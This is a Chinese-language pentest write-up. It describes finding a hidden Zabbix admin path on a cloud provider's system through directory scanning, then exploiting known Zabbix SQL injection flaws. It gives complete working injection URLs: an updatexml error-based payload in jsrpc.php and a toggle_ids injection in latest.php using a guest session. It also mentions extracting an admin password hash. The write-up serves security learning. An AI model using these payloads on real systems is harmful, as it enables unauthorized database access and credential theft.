记一次渗透测试#信息收集(目录扫描+通用漏洞) 前言目录扫描是渗透测试信息收集阶段核心手段能挖掘网站未公开后台、监控管理系统等隐藏路径大幅扩充攻击面。本文以金山云业务系统实战为例先通过目录扫描发现 Zabbix 监控后台再结合该组件历史通用漏洞开展手工 SQL 注入测试完整演示从目录探测到漏洞利用的完整流程为常规资产渗透提供实操思路。一、目录扫描通过子域名收集发现金山云某个系统登录页面存在隐患#1无验证码可装库及密码爆破。因为爆破的结果不够理想于是习惯性的打开御剑后台扫描工具对该域名进行后台目录扫描扫面结果发现有个zabbix的目录// 御剑的目录字典可修改访问得到如下页面二、通用漏洞同样在弱口令测试无果之后我开始百度搜索zabbix漏洞点进去浏览发现这是一篇 zabbix漏洞汇总的文章弱口令、注入、命令注入参考链接https://www.cnblogs.com/KevinGeorge/p/8268072.html测试注入#1构造urlhttps://xxxxxx.xxxx.com/zabbix/jsrpc.php?sid0bcd4ade648214dctype9methodscreen.get×tamp1471403798083mode2screenidgroupidhostid0pageFilehistory.phpprofileIdxweb.item.graphprofileIdx21orupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)or11)%23updateProfiletruescreenitemidperiod3600stime20160817050632resourcetype17itemids%5B23297%5D23297actionshowlatestfilterfilter_taskmark_color1poc1orupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)or11)%23注入参数profileIdx2数据库名zabbix测试注入#2发现这个注入攻击条件略苛刻需要登录后得到的16位sessionid不然利用不了经过测试使用guest登录后的sessionid有效于是构造urlhttps://xxxx.xxxxx.com/zabbix/latest.php?sid92d8fcd40710a9a2favobjtoggletoggle_open_state1toggle_ids[]15385/user()pocxxx/user()注入参数toogle_ids用户名为zabbix// 手工注入的到管理员密码哈希可惜解不出来不然还可以提一个弱口令本文关键字后台目录扫描、系统通用漏洞、手工注入总结1、目录扫描可挖掘隐藏管理后台目标登录页无验证码存在爆破风险。2、Zabbix 存在多处历史注入漏洞部分无需登录即可利用读取数据库信息。3、部分注入漏洞依赖有效 Session访客账号会话也可满足利用条件。4、注入可查询库名、当前用户仅获取密码哈希难以直接破解提权。5、渗透流程可复用目录扫隐藏资产→检索组件漏洞→手工测试验证风险。